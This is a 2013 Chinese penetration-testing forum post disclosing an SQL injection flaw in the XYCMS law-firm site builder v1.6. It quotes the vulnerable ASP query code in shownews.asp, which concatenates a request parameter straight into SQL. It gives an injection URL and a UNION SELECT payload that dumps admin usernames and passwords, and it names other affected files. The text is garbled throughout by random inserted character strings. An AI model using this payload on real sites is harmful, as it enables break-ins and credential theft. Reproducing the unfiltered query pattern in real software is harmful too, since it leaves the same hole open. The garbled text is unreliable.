中国网络渗透测试联盟

标题: XYCMS律师事务所建站系统注入漏洞 [打印本页]
作者: admin    时间: 2013-4-4 17:28
标题: XYCMS律师事务所建站系统注入漏洞
前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似' t" s3 ?2 b( a; m5 i, b
" z. ?9 P$ T+ O1 I$ }- ^$ e
淫荡分割线
" A, W& t, F9 g, b1 [3 E4 q--------------------------------------------------------3 ]; m4 N; I3 V4 u2 @
' ?, V) i4 `# h
审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)
) a1 G6 F# y* y; a! t源码地址:http://down.chinaz.com/soft/29233.htm2 W0 E' V$ _8 t( O4 k

/ Y0 h! o  S$ f% J7 M漏洞文件:shownews.asp6 ]- W, t  r: U
漏洞代码:7-13行
, q6 M: o7 B# a1 ]8 a, V7 Y& y ! J, ~3 D: }3 U  e1 x
6 s5 T7 i2 U* @
<% & n0 {5 T2 x& u1 h5 V! t
id=request.QueryString("id")
6 R1 j. N, N3 V' M: K  M    ' k7 e5 l8 D3 w
set snews=server.createobject("adodb.recordset")
# k' u# e' }6 _- S/ h7 _! B; Vexec="select * from [news] where id="&id* J9 [- W# p0 `( g
snews.open exec,conn,1,1
2 W8 ]- K, n3 d' y%>
: }  s1 o' M. E . L, x& U8 w5 r! s
) j9 E! Z$ z, P& Q+ L) O
什么过滤都没有  直造成注入
1 z& e- O" s3 d* F/ Z1 L8 Y
6 U% _/ J, X0 b' M注入点:http://127.0.0.1:99/shownews.asp?id=xx% P2 k1 @  r) L8 }  F$ e7 P
1 X9 e" _' q% d5 V8 R
其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找5 M! @: d# o2 d6 Z5 {4 s) j
5 N3 t: E. L5 g( O. t' y% ?
/ _+ C- d5 {; p" L* Y3 c+ ]# O
exp: union select 1,admin,password,4,5,7 from admin_user
' Q! T1 ]! V- E6 _  e
+ L. `' u" a( b2 u+ @- h



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2